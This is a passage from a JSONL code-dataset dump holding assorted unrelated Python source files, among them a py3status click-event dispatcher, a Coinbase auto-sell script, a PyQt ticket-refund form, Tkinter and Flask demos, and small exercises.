###\n op.drop_table('food_order_item')\n op.drop_table('food_order')\n # ### end Alembic commands ###\n","repo_name":"nexocodecom/nisse.io","sub_path":"migrations/versions/8e40e31eff4d_add_food_model.py","file_name":"8e40e31eff4d_add_food_model.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"72834715435","text":"import six\n\nfrom neutron._i18n import _\n\nfrom nuage_neutron.plugins.common.base_plugin import BaseNuagePlugin\nfrom nuage_neutron.plugins.common import exceptions\nfrom nuage_neutron.plugins.common import utils as nuage_utils\n\n\nclass VsdPassthroughResource(BaseNuagePlugin):\n vsd_to_os = {}\n os_to_vsd = {}\n vsd_filterables = []\n extra_filters = []\n filters_to_ignore = ['tenant_id']\n\n def osfilters_to_vsdfilters(self, filters):\n for f in self.filters_to_ignore:\n filters.pop(f, None)\n if not all(x in self.vsd_filterables for x in filters or []):\n msg = (_(\"Only %s are filterable fields\")\n % (self.vsd_filterables + self.extra_filters))\n raise exceptions.NuageBadRequest(msg=msg)\n return nuage_utils.filters_to_vsd_filters(self.vsd_filterables,\n filters,\n self.os_to_vsd)\n\n def map_vsd_to_os(self, resource, fields=None):\n return self._translate_dict(resource, self.vsd_to_os, fields=fields)\n\n def map_os_to_vsd(self, resource, fields=None):\n return self._translate_dict(resource, self.os_to_vsd, fields=fields)\n\n def _translate_dict(self, resource, translation_mapping, fields=None):\n dict = {}\n for key, value in six.iteritems(translation_mapping):\n if hasattr(value, '__call__'):\n value(resource, dict)\n elif key in resource:\n dict[value] = resource[key]\n return self._fields(dict, fields)\n","repo_name":"nuagenetworks/nuage-openstack-neutron","sub_path":"nuage_neutron/plugins/common/service_plugins/vsd_passthrough_resource.py","file_name":"vsd_passthrough_resource.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"73"} +{"seq_id":"15774691937","text":"\n#insert deta\n\ndef insert_dict(a_list = {}, key = None, val = None):\n if type(a_list) != dict:\n print(\"Invalid type. You need to enter a dictionary type. you entered\",type(a_list))\n elif key == None or val == None:\n print(\"Please enter a name and birth date.\")\n elif key in a_list:\n print(f\"{key} has been already inserted.\")\n else:\n a_list[key] = val\n print(\"Successful inserted!!\")\n select_dict(a_list, key)\n\n#select data\n\ndef select_dict(a_list = {}, key = None):\n if type(a_list) != dict:\n print(\"Invalid type. You need to enter a dictionary type. you entered\",type(a_list))\n elif key == None:\n print(\"Please enter data to search for.\")\n elif key not in a_list:\n print(f\"{key} is not found.\")\n else:\n print(f\"{key} : \",a_list[key])\n\n#update data\n\ndef update_dict(a_list = {}, key = None, val = None):\n if type(a_list) != dict:\n print(\"Invalid type. You need to enter a dictionary type. you entered\",type(a_list))\n elif key == None or val == None:\n print(\"Please enter name and birth date to update.\")\n elif key not in a_list:\n print(f\"{key} is not found and can't update.\" )\n else:\n a_list[key] = val\n print(\"Successful updated!\")\n select_dict(a_list, key)\n\n#delete data \n\ndef delete_dict(a_list = {}, key = None):\n if type(a_list) != dict:\n print(\"Invalid type. You need to enter a dictionary type. 
you entered\",type(a_list))\n elif key == None:\n print(\"Please enter name to delete.\")\n elif key not in a_list:\n print(f\"{key} is not found and can't delete.\" )\n else:\n del a_list[key]\n print(\"Successful deleted!\")\n select_dict(a_list, key)\n\n\nbts = { \n \"jin\" : 921204,\n \"suga\" : 930309,\n \"J-hope\" : 940218,\n \"RM\" : 9409,\n \"jimin\" : 951013,\n \"v\" : 951230,\n \"abc\" : 123456\n}\n\nprint(bts)\nprint()\ninsert_dict(\"jungkook\",970901)\ninsert_dict(bts,\"jungkook\")\ninsert_dict(bts,\"jungkook\",970901)\ninsert_dict(bts,\"jungkook\",970901)\nprint()\nselect_dict(\"v\")\nselect_dict(bts)\nselect_dict(bts,\"v\")\nselect_dict(bts,\"rm\")\nprint()\nupdate_dict(\"RM\",940912)\nupdate_dict(bts,\"RM\")\nupdate_dict(bts,\"RM\",940912)\nupdate_dict(bts,\"rm\",940912)\nprint()\ndelete_dict(\"abc\")\ndelete_dict(bts)\ndelete_dict(bts,\"abc\")\ndelete_dict(bts,\"abc\")\nprint()\nprint(bts)\n","repo_name":"naturalMin/jm_study","sub_path":"Python_Webscrapper_nomad/bts_dict.py","file_name":"bts_dict.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"467120347","text":"import time\nfrom ExRates import MyExRates\nfrom currency import MyCurrency\nfrom datalogger import DataLogger\nfrom endpoints import *\n\ndef set_transfers(accounts, payment_methods):\n accountList = accounts.get_accounts()['accounts']\n pmList = payment_methods.get_payment_methods()['payment_methods']\n \n accountID = ''\n pmID =''\n \n iii = 1\n for account in accountList:\n if account['type'] == 'wallet':\n account.update(enum=str(iii))\n print(account['enum'] + ' - ' + account['name'])\n iii += 1\n\n optAccount = input('Select which wallet to monitor: ')\n for account in accountList:\n if account['type'] == 'wallet':\n if account['enum'] == optAccount:\n accountID = account['id']\n\n print()\n\n iii = 1\n for pm in pmList:\n pm.update(enum=str(iii))\n print(pm['enum'] + ' - ' + pm['name'])\n iii += 1\n\n optAccount = input('Select which account to pay from / sell to: ')\n for pm in pmList:\n if pm['enum'] == optAccount:\n pmID = pm['id']\n\n return Transfers(accountID, pmID)\n\ndef loop(client, account_currency, payment_method_currency, transfers):\n sell_target = 141.00 \n quote_sell_at = 0.95 # Ratio of sell price when quotes will be obtained (0.00 to 1.00)\n\n exRates = MyExRates(client.client, account_currency, payment_method_currency)\n data_logger = DataLogger(exRates.dict, 'pricelog.csv')\n \n while True:\n exRates = MyExRates(client.client, account_currency, payment_method_currency)\n account = client.client.get_account(transfers.wallet)\n\n spot_value = exRates.spot_price * float(account['balance']['amount'])\n \n print()\n print('Account Balance: ' + str(account['balance']['amount']) + ' ' + account['balance']['currency'])\n print('Spot Price: ' + str(exRates.spot_price))\n print('Spot Value: ' + str(spot_value))\n print('Spot value at ' + str(\"%.2f\" % (spot_value / sell_target * 100)) + '% of target (' + str(sell_target) +').')\n\n if spot_value > sell_target * quote_sell_at:\n quote = client.client.sell(transfers.wallet,\n amount=str(account['balance']['amount']),\n currency='BTC',\n payment_method=transfers.payment_method,\n quote=True)\n\n print('Spot price within ' + str(quote_sell_at * 100) + '% of target - Getting quote')\n if float(quote['total']['amount']) > sell_target:\n print('Attempting Sell')\n sell = client.client.sell(transfers.wallet,\n 
amount=str(account['balance']['amount']),\n currency=account['balance']['currency'],\n payment_method=transfers.payment_method,\n quote=False)\n \n print('Sold ' + sell['total']['amount'])\n else:\n print('Quote of ' + quote['total']['amount'] + ' too low - No sell')\n\n data_logger.add_line(exRates.dict)\n time.sleep(10)\n \n\ndef main():\n\n \n connected = False\n while not connected:\n myClient = MyClient()\n connected = myClient.connected\n\n if connected:\n myUser = MyUser(myClient.client)\n myAccounts = MyAccounts(myClient.client)\n myPaymentMethods = MyPaymentMethods(myClient.client)\n transfers = set_transfers(myAccounts, myPaymentMethods)\n \n account_currency = MyCurrency(myClient.client,\n myAccounts.get_account(transfers.wallet)['currency'])\n\n payment_method_currency = MyCurrency(myClient.client,\n myPaymentMethods.get_payment_method(transfers.payment_method)['currency'])\n\n exRates = MyExRates(myClient.client, account_currency, payment_method_currency)\n \n\n loop(myClient, account_currency, payment_method_currency, transfers)\n\nif __name__ == '__main__': \n main()\n \n","repo_name":"MikoG/clever-coins","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"2019054059","text":"import select\nimport sys\nfrom json import loads\nfrom shlex import quote as shell_quote\nfrom subprocess import PIPE, Popen\nfrom threading import Thread\n\nfrom py3status.profiling import profile\n\n\nclass IOPoller:\n \"\"\"\n This class implements a predictive and timing-out I/O reader\n using select and the poll() mechanism for greater compatibility.\n \"\"\"\n\n def __init__(self, io, eventmask=select.POLLIN):\n \"\"\"\n Our default is to read (POLLIN) the specified 'io' file descriptor.\n \"\"\"\n self.io = io\n self.poller = select.poll()\n self.poller.register(io, eventmask)\n\n def readline(self, timeout=500):\n \"\"\"\n Try to read our I/O for 'timeout' milliseconds, return None otherwise.\n This makes calling and reading I/O non blocking !\n \"\"\"\n poll_result = self.poller.poll(timeout)\n if poll_result:\n line = self.io.readline().strip()\n # when using pydev.debugger sys.stdin gets overwritten and placed\n # into sys.stdin.original_stdin issue #2090\n if self.io == getattr(sys.stdin, \"original_stdin\", sys.stdin) and line == \"[\":\n # skip first event line wrt issue #19\n line = self.io.readline().strip()\n try:\n # python3 compatibility code\n line = line.decode()\n except (AttributeError, UnicodeDecodeError):\n pass\n return line\n else:\n return None\n\n\nclass EventTask:\n \"\"\"\n A simple task that can be run by the scheduler.\n \"\"\"\n\n def __init__(self, module_name, event, default_event, events_thread):\n self.events_thread = events_thread\n self.module_full_name = module_name\n self.default_event = default_event\n self.event = event\n\n def run(self):\n self.events_thread.process_event(self.module_full_name, self.event, self.default_event)\n\n\nclass EventClickTask:\n \"\"\"\n A task to run an external on_click event\n \"\"\"\n\n def __init__(self, module_name, event, events_thread, command):\n self.events_thread = events_thread\n self.module_name = module_name\n self.command = command\n self.event = event\n\n def run(self):\n self.events_thread.on_click_dispatcher(self.module_name, self.event, self.command)\n\n\nclass Events(Thread):\n \"\"\"\n This class is responsible for dispatching event JSONs sent by the i3bar.\n \"\"\"\n\n 
def __init__(self, py3_wrapper):\n \"\"\"\n We need to poll stdin to receive i3bar messages.\n \"\"\"\n Thread.__init__(self)\n self.config = py3_wrapper.config\n self.error = None\n self.py3_config = py3_wrapper.config[\"py3_config\"]\n self.modules = py3_wrapper.modules\n self.on_click = self.py3_config[\"on_click\"]\n self.output_modules = py3_wrapper.output_modules\n self.poller_inp = IOPoller(sys.stdin)\n self.py3_wrapper = py3_wrapper\n\n def get_module_text(self, module_name, event):\n \"\"\"\n Get the full text for the module as well as the partial text if the\n module is a composite. Partial text is the text for just the single\n section of a composite.\n \"\"\"\n index = event.get(\"index\")\n module_info = self.py3_wrapper.output_modules.get(module_name)\n output = module_info[\"module\"].get_latest()\n full_text = \"\".join(out[\"full_text\"] for out in output)\n\n partial = None\n if index is not None:\n if isinstance(index, int):\n partial = output[index]\n else:\n for item in output:\n if item.get(\"index\") == index:\n partial = item\n break\n if partial:\n partial_text = partial[\"full_text\"]\n else:\n partial_text = full_text\n return full_text, partial_text\n\n def on_click_dispatcher(self, module_name, event, command):\n \"\"\"\n Dispatch on_click config parameters to either:\n - Our own methods for special py3status commands (listed below)\n - The i3-msg program which is part of i3wm\n \"\"\"\n if command is None:\n return\n elif command == \"refresh_all\":\n self.py3_wrapper.refresh_modules()\n elif command == \"refresh\":\n self.py3_wrapper.refresh_modules(module_name)\n else:\n # In commands we are able to use substitutions for the text output\n # of a module\n if \"$OUTPUT\" in command or \"$OUTPUT_PART\" in command:\n full_text, partial_text = self.get_module_text(module_name, event)\n command = command.replace(\"$OUTPUT_PART\", shell_quote(partial_text))\n command = command.replace(\"$OUTPUT\", shell_quote(full_text))\n\n # this is a i3 message\n self.wm_msg(module_name, command)\n # to make the bar more responsive to users we ask for a refresh\n # of the module or of i3status if the module is an i3status one\n self.py3_wrapper.refresh_modules(module_name)\n\n def wm_msg(self, module_name, command):\n \"\"\"\n Execute the message with i3-msg or swaymsg and log its output.\n \"\"\"\n wm_msg = self.config[\"wm\"][\"msg\"]\n pipe = Popen([wm_msg, command], stdout=PIPE)\n self.py3_wrapper.log(\n '{} module=\"{}\" command=\"{}\" stdout={}'.format(\n wm_msg, module_name, command, pipe.stdout.read()\n )\n )\n\n def process_event(self, module_name, event, default_event=False):\n \"\"\"\n Process the event for the named module.\n Events may have been declared in i3status.conf, modules may have\n on_click() functions. 
There is a default middle click event etc.\n \"\"\"\n\n # get the module that the event is for\n module_info = self.output_modules.get(module_name)\n\n # if module is a py3status one call it.\n if module_info[\"type\"] == \"py3status\":\n module = module_info[\"module\"]\n module.click_event(event)\n if self.config[\"debug\"]:\n self.py3_wrapper.log(f\"dispatching event {event}\")\n\n # to make the bar more responsive to users we refresh the module\n # unless the on_click event called py3.prevent_refresh()\n if not module.prevent_refresh:\n self.py3_wrapper.refresh_modules(module_name)\n default_event = False\n\n if default_event:\n # default button 2 action is to clear this method's cache\n if self.config[\"debug\"]:\n self.py3_wrapper.log(f\"dispatching default event {event}\")\n self.py3_wrapper.refresh_modules(module_name)\n\n # find container that holds the module and call its onclick\n module_groups = self.py3_config[\".module_groups\"]\n containers = module_groups.get(module_name, [])\n for container in containers:\n self.process_event(container, event)\n\n def dispatch_event(self, event):\n \"\"\"\n Takes an event dict. Logs the event if needed and cleans up the dict\n such as setting the index needed for composits.\n \"\"\"\n if self.config[\"debug\"]:\n self.py3_wrapper.log(f\"received event {event}\")\n\n # usage variables\n event[\"index\"] = event.get(\"index\", \"\")\n instance = event.get(\"instance\", \"\")\n name = event.get(\"name\", \"\")\n\n # composites have an index which is passed to i3bar with\n # the instance. We need to separate this out here and\n # clean up the event. If index\n # is an integer type then cast it as such.\n if \" \" in instance:\n instance, index = instance.split(\" \", 1)\n try:\n index = int(index)\n except ValueError:\n pass\n event[\"index\"] = index\n event[\"instance\"] = instance\n\n if self.config[\"debug\"]:\n self.py3_wrapper.log(\n 'trying to dispatch event to module \"{}\"'.format(f\"{name} {instance}\".strip())\n )\n\n # guess the module config name\n module_name = f\"{name} {instance}\".strip()\n\n default_event = False\n module_info = self.output_modules.get(module_name)\n module = module_info[\"module\"]\n # execute any configured i3-msg command\n # we do not do this for containers\n # modules that have failed do not execute their config on_click\n if module.allow_config_clicks:\n button = event.get(\"button\", 0)\n on_click = self.on_click.get(module_name, {}).get(str(button))\n if on_click:\n task = EventClickTask(module_name, event, self, on_click)\n self.py3_wrapper.timeout_queue_add(task)\n # otherwise setup default action on button 2 press\n elif button == 2:\n default_event = True\n\n # do the work\n task = EventTask(module_name, event, default_event, self)\n self.py3_wrapper.timeout_queue_add(task)\n\n @profile\n def run(self):\n \"\"\"\n Wait for an i3bar JSON event, then find the right module to dispatch\n the message to based on the 'name' and 'instance' of the event.\n\n In case the module does NOT support click_events, the default\n implementation is to clear the module's cache\n when the MIDDLE button (2) is pressed on it.\n\n Example event:\n {'y': 13, 'x': 1737, 'button': 1, 'name': 'empty', 'instance': 'first'}\n \"\"\"\n try:\n while self.py3_wrapper.running:\n event_str = self.poller_inp.readline(timeout=None)\n if not event_str:\n continue\n try:\n # remove leading comma if present\n if event_str[0] == \",\":\n event_str = event_str[1:]\n event = loads(event_str)\n self.dispatch_event(event)\n except 
Exception:\n self.py3_wrapper.report_exception(\"Event failed\")\n except: # noqa e722\n err = \"Events thread died, click events are disabled.\"\n self.py3_wrapper.report_exception(err, notify_user=False)\n self.py3_wrapper.notify_user(err, level=\"warning\")\n","repo_name":"ultrabug/py3status","sub_path":"py3status/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":10395,"program_lang":"python","lang":"en","doc_type":"code","stars":873,"dataset":"github-code","pt":"73"} +{"seq_id":"6201554755","text":"from PyQt5.QtWidgets import *\r\n\r\n\r\nclass Tickets(QWidget):\r\n def __init__(self, cnx=None):\r\n super().__init__()\r\n self.cnx = cnx\r\n self.number = None\r\n self.cursor = cnx.cursor(buffered=True)\r\n self.initUI()\r\n\r\n def initUI(self):\r\n label = QLabel('Podaj numer transakcji: ', self)\r\n label.move(10, 20)\r\n\r\n self.number = QLineEdit(self)\r\n self.number.resize(50, 20)\r\n self.number.move(145, 18)\r\n\r\n ok_btn = QPushButton('OK', self)\r\n ok_btn.resize(50, 30)\r\n ok_btn.move(10, 60)\r\n\r\n back_btn = QPushButton('Wróć', self)\r\n back_btn.resize(50, 30)\r\n back_btn.move(110, 60)\r\n\r\n back_btn.clicked.connect(self.back_btn_click)\r\n ok_btn.clicked.connect(self.ok_btn_click)\r\n\r\n self.setGeometry(300, 300, 200, 100)\r\n self.setWindowTitle('Zwrot biletu')\r\n self.show()\r\n\r\n def back_btn_click(self):\r\n self.close()\r\n\r\n def ok_btn_click(self):\r\n try:\r\n value = int(self.number.text())\r\n ticket = ('Select * from historia_transakcji')\r\n self.cursor.execute(ticket)\r\n if self.cursor.rowcount == 0:\r\n alert = QMessageBox()\r\n alert.setText('Brak wierszy do wyświetlenia!')\r\n alert.exec_()\r\n for (i, (id, _, _, _, _, _, _)) in enumerate(self.cursor):\r\n if value == id:\r\n self.cursor.execute('select suma from historia_transakcji where id_transakcji = {}'.format(value))\r\n (suma,) = self.cursor\r\n self.cursor.execute(('delete from historia_transakcji where id_transakcji = {}'.format(value)))\r\n alert = QMessageBox()\r\n alert.setText('Pomyślnie zwrócono bilet! Zwrócona kwota wynosi {} zł'.format(suma[0]))\r\n alert.exec_()\r\n self.cnx.commit()\r\n break\r\n\r\n if i + 1 == self.cursor.rowcount:\r\n alert = QMessageBox()\r\n alert.setText('Błędny numer transakcji!')\r\n alert.exec_()\r\n\r\n except:\r\n alert = QMessageBox()\r\n alert.setText('Niepoprawne dane! Numer biletu powinien być liczbą!')\r\n alert.exec_()\r\n\r\n\r\n","repo_name":"Dawkon99/BazyDanych2-projekt","sub_path":"src/tickets.py","file_name":"tickets.py","file_ext":"py","file_size_in_byte":2341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"4143723740","text":"# Write the (very short) function handtodice(hand) that takes a hand, which is a 3-digit\r\n# integer, and returns 3 values, each of the 3 dice in the hand. 
For example:\r\n# assert(handToDice(123) == (1,2,3))\r\n# assert(handToDice(214) == (2,1,4))\r\n# assert(handToDice(422) == (4,2,2))\r\n# Hint: You might find // and % useful here, and also getKthDigit().\r\n\r\ndef handtodice(hand):\r\n\t# your code goes here\r\n\tfirst=hand//100\r\n\tsecond=(hand % 100) // 10\r\n\tthird=(hand % 10)\r\n\treturn first,second,third\r\n","repo_name":"HumpyMiryala/Competitive-Programming-Humpy","sub_path":"10-handtodice-Python/handtodice.py","file_name":"handtodice.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"2362693489","text":"from tkinter import * # 임포트\n\nroot = Tk() # 변수 설정\nroot.title('GUI BASIC') # 창 이름\nroot.geometry('640x480+50+50') # 가로 * 세로 + X좌표 + Y좌표\nroot.resizable(False, False) # X, Y 창 값 변경 불가\nicon = PhotoImage(file = 'img/icon.png') # icon 변수 안에 이미지 넣어주기\nroot.iconphoto(False, icon) # False(필수) 넣고 이미지 변수 넣기\n\n\n\nlabel1 = Label(root, text='아래중에서 골라주세요').pack()\n\n\n\nradiovar = IntVar()\nbtn_radio1 = Radiobutton(root, text='1번', value=1, variable=radiovar) # variable은 공유하지만 value는 따로 지정해줘야함\nbtn_radio1.select()\nbtn_radio2 = Radiobutton(root, text='2번', value=2, variable=radiovar)\nbtn_radio3 = Radiobutton(root, text='3번', value=3, variable=radiovar)\n\nbtn_radio1.pack()\nbtn_radio2.pack()\nbtn_radio3.pack()\n\nlabel2 = Label(root, text='또 선택해주세요').pack()\n\nbtn_hehe_var = StringVar()\nbtn_hehe4 = Radiobutton(root, text='4번', value='4번', variable=btn_hehe_var)\nbtn_hehe4.select()\nbtn_hehe5 = Radiobutton(root, text='5번', value='5번', variable=btn_hehe_var)\n\nbtn_hehe4.pack()\nbtn_hehe5.pack()\n\ndef btncmd():\n print(f'라디오의 value값 : {radiovar.get()}')\n print(f'4, 5번중에는..? : {btn_hehe_var.get()}')\n\nbtn = Button(root, text='버튼', command=btncmd)\nbtn.pack()\n\nroot.mainloop() # 계속 띄우기","repo_name":"gomteeng/GUI","sub_path":"GUI_BASIC/7_radiobutton.py","file_name":"7_radiobutton.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"16873753223","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n@author: Shinai Sorensen\r\n@date: October 27, 2020\r\n\r\nThis program open a text.txt file in the same folder and filters the information\r\ninto words without punctuation.\r\nCounts the number of each words then prints out the total number of words and a list\r\nof all the words and there count total.\r\n\"\"\"\r\n\r\n# Import the Counter to count all the different words in the text file\r\nfrom collections import Counter\r\n\r\n# Open the file and create a string from the contents of the text file\r\ndef retrieve_string():\r\n # Open the file and encode as UTF-8 so there are no errors\r\n myfile = open('text.txt',encoding='utf-8')\r\n \r\n # Seek the beginning of the file every time you open it\r\n myfile.seek(0)\r\n \r\n # Read the file and store in a string\r\n string = myfile.read()\r\n \r\n # Close the file\r\n myfile.close()\r\n \r\n # Split the string so you can look at each word individually\r\n return string, string.split()\r\n \r\n# Remove all punctuation and change to lowercase letters then return a filtered list\r\ndef filter_string(string, words):\r\n # Make a list of all the punctuation, except spaces (to make sure you still have words after)\r\n punc = '''!()-[]{};:'\"\\,<>./?@#$%^&*_~''' \r\n\r\n # Loop through all the words in the list\r\n for word in words:\r\n \r\n # Loop through all the characters in a word\r\n for char in 
word:\r\n \r\n # If the char is a punctuation or digit, remove it\r\n if char in punc or char.isdigit():\r\n \r\n # Replace the punc with nothing (ie remove it from the word)\r\n string = string.replace(char,'')\r\n \r\n # If the char is an uppercase character, replace it with the lowercase instead\r\n if char.isupper():\r\n string = string.replace(char,char.lower())\r\n \r\n # Create a new list\r\n filter_words = string.split()\r\n \r\n return filter_words\r\n\r\n# Run the main function of the program\r\ndef run():\r\n\r\n print(\"\\nThis program open a file called 'text.txt' and prints out a counted list of words.\")\r\n\r\n # Split the string so you can look at each word individually\r\n string, words = retrieve_string()\r\n \r\n # Filter the string into a new list\r\n filter_words = filter_string(string, words)\r\n \r\n # Get the total number of words\r\n total = len(words) \r\n \r\n # Print out a summary of the findings\r\n print(f'\\nSummary: from the text file there were {total} words.')\r\n \r\n for item,num in Counter(filter_words).items():\r\n print(f'{item}:{num}') \r\n\r\n# Run the program\r\nrun()\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"shinaisorensen/udemypython","sub_path":"Final Projects/Text/Count Words in a String/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":2665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"40381598664","text":"from flask import Flask, jsonify, request\nfrom flask_cors import CORS\nfrom movie_data_scrapper import *\n\napp = Flask(__name__)\napp.config['CORS_HEADERS'] = 'Content-Type'\nCORS(app)\n\n@app.route(\"/\")\ndef home():\n return \"Home\"\n\n@app.route(\"/get_data\", methods=[\"GET\", \"POST\"])\ndef get_data():\n data = request.args\n movie_id = data[\"movie_id\"] \n movie_data, all_persons_data = get_m_data(movie_id)\n return {\"movie_data\": movie_data, \"persons_data\": all_persons_data}\n\nif(__name__==\"__main__\"):\n app.run(debug=True)","repo_name":"bulidiriba/movie-data-scrapper","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"23141625382","text":"#!/usr/bin/env python\n# coding: utf-8\n\nfrom LineEmUp import LineEmUp\nimport random\n\n\nclass ScoreBoard:\n \"\"\"\n Simulates 2*r LineEmUp games and writes relevant statistics to a file\n\n Attributes:\n num_of_games_per_symbol - number of games to be simulated per color (i.e. 
total games = 2*r)\n destination - filepath to be written to\n average_heuristic_times\n average_state_counts\n average_depth_averages\n average_total_state_counts_p_depth\n average_ard_averages\n average_move_counter\n\n * Note that almost all attributes are simply averages of the averages calculated at the end of each game\n \"\"\"\n\n def __init__(self, r=10):\n self.num_of_games_per_symbol = r\n self.average_heuristic_times = 0\n self.average_state_counts = 0\n self.average_depth_averages = 0\n self.average_total_state_counts_p_depth = {}\n self.average_ard_averages = 0\n self.average_move_counter = 0\n self.winning_e1 = 0\n self.winning_e2 = 0\n self.destination = 'scoreboard.txt'\n\n def calculateScore(self, config):\n \"\"\"\n Runs 2*r simulations of LineEmUp and calculates all all relevant statistics.\n :return:\n \"\"\"\n n = int(config[\"conf\"][0])\n b = int(config[\"conf\"][1])\n s = int(config[\"conf\"][2])\n t = int(config[\"conf\"][3])\n d1 = int(config[\"conf\"][4])\n d2 = int(config[\"conf\"][5])\n if config[\"a1\"]:\n a1 = LineEmUp.ALPHABETA\n else:\n a1 = LineEmUp.MINIMAX\n if config[\"a2\"]:\n a2 = LineEmUp.ALPHABETA\n else:\n a2 = LineEmUp.MINIMAX\n\n if \"blocks\" in config:\n blocks = config[\"blocks\"]\n else:\n blocks = [(random.randrange(0, n), random.randrange(0, n)) for i in range(b)]\n\n self.g = LineEmUp(board_size=n, blocks=b, blocks_coord=blocks, winning_size=s, max_move_time=t, recommend=True,\n player_w=LineEmUp.AI, player_b=LineEmUp.AI, heuristic_w=LineEmUp.E1,\n heuristic_b=LineEmUp.E2, a1=a1, a2=a2, d1=d1, d2=d2)\n for play in range(0, self.num_of_games_per_symbol):\n self.g.play()\n stats = self.g.getStats()\n self.average_heuristic_times += stats[0]\n self.average_state_counts += stats[1]\n self.average_depth_averages += stats[2]\n for depth in stats[3]:\n if depth in self.average_total_state_counts_p_depth:\n self.average_total_state_counts_p_depth[depth] += stats[3][depth]\n else:\n self.average_total_state_counts_p_depth[depth] = stats[3][depth]\n\n self.average_ard_averages += stats[4]\n self.average_move_counter += stats[5]\n\n self.g = LineEmUp(board_size=n, blocks=b, blocks_coord=blocks, winning_size=s, max_move_time=t, recommend=True,\n player_w=LineEmUp.AI, player_b=LineEmUp.AI, heuristic_w=LineEmUp.E2,\n heuristic_b=LineEmUp.E1, a1=a1, a2=a2, d1=d1, d2=d2)\n for play in range(0, self.num_of_games_per_symbol):\n self.g.play()\n stats = self.g.getStats()\n self.average_heuristic_times += stats[0]\n self.average_state_counts += stats[1]\n self.average_depth_averages += stats[2]\n for depth in stats[3]:\n if depth in self.average_total_state_counts_p_depth:\n self.average_total_state_counts_p_depth[depth] += stats[3][depth]\n else:\n self.average_total_state_counts_p_depth[depth] = stats[3][depth]\n self.average_ard_averages += stats[4]\n self.average_move_counter += stats[5]\n if stats[7] == 'e1' :\n self.winning_e1 += 1\n elif stats[7] == 'e2':\n self.winning_e2 += 1\n\n self.average_heuristic_times = self.average_heuristic_times / (self.num_of_games_per_symbol * 2)\n self.average_state_counts = self.average_state_counts / (self.num_of_games_per_symbol * 2)\n self.average_depth_averages = self.average_depth_averages / (self.num_of_games_per_symbol * 2)\n for depth in stats[3]:\n self.average_total_state_counts_p_depth[depth] = self.average_total_state_counts_p_depth[depth] / (\n self.num_of_games_per_symbol * 2)\n self.average_ard_averages = self.average_ard_averages / (self.num_of_games_per_symbol * 2)\n self.average_move_counter = 
self.average_move_counter / (self.num_of_games_per_symbol * 2)\n\n def printAverageEndOfAllGames(self, id):\n \"\"\"\n Prints the results to a file. calculateScore() must first be called.\n\n :return:\n \"\"\"\n if self.g is None:\n raise ValueError(\"Game(s) have not been instantiated. calculateScore() must first be called. \")\n\n file = open('scoreboard' + str(id) + '.txt', 'w+')\n self.g.printIntialGameToFile(file)\n file.write(\"\")\n file.write(\"Heuristic 1 winning %: \" + str(round(self.winning_e1 / 2.0 * self.num_of_games_per_symbol, 2)) + '\\n')\n file.write(\"Heuristic 2 winning %: \" + str(round(self.winning_e2 / 2.0 * self.num_of_games_per_symbol, 2)) + '\\n')\n file.write('i. Average of Average evaluation time of heuristic: ' + str(self.average_heuristic_times) + '\\n')\n file.write('ii. Average of Total states evaluated: ' + str(self.average_state_counts) + '\\n')\n file.write('iii. Average of Average of average depths: ' + str(self.average_depth_averages) + '\\n')\n file.write('iv. Average Total number of states evaluated at each depth: ' + '\\n')\n for depth in sorted(self.average_total_state_counts_p_depth.keys(), reverse=True):\n file.write(\"\\t\" + str(depth) + \": \" + str(self.average_total_state_counts_p_depth[depth]) + '\\n')\n file.write('v. Average of Average ARD: ' + str(self.average_ard_averages) + '\\n')\n file.write('vi. Average Total Move Count: ' + str(self.average_move_counter) + '\\n')\n file.close()\n","repo_name":"stefanoScalzo/COMP472_MP2","sub_path":"ScoreBoard.py","file_name":"ScoreBoard.py","file_ext":"py","file_size_in_byte":6135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"9640160227","text":"# is_nick(string) takes 'string' and determines if it is a valid IRC nickname\n# is_nick: Str -> Bool\n# requires: isinstance(string, str)\ndef is_nick(string):\n for i, char in enumerate(string):\n if ((i > 0 and (char.isdigit() or char == '-')) or\n char.isalpha() or char in '_-\\[]{}^`|'):\n continue\n else:\n return False\n return True\n \n# is_float(object_) takes any object 'object_' and returns a boolean for\n# whether it can be converted into a float\n# is_float: Any -> Bool\ndef is_float(object_):\n try:\n float(object_)\n return True\n except:\n return False\n\n","repo_name":"KittyHawkIrc/core","sub_path":"arsenic_helper.py","file_name":"arsenic_helper.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"73"} +{"seq_id":"7416313174","text":"def lengthOfLongestConsecutiveSequence(arr, n):\n mx = 0\n \n # To store the length of current consecutive Sequence.\n count = 0\n \n # To store all the unique elements of array.\n sett = set()\n \n for element in arr:\n sett.add(element)\n \n for element in arr:\n \n previousConsecutiveElement=element-1\n \n if(not previousConsecutiveElement in sett):\n \n # Element is the first value of consecutive sequence.\n j = element\n \n while j in sett:\n \n # The next consecutive element by will be j + 1.\n j += 1\n \n # Update maximum length of consecutive subsequence.\n mx = max(mx , j-element)\n \n return 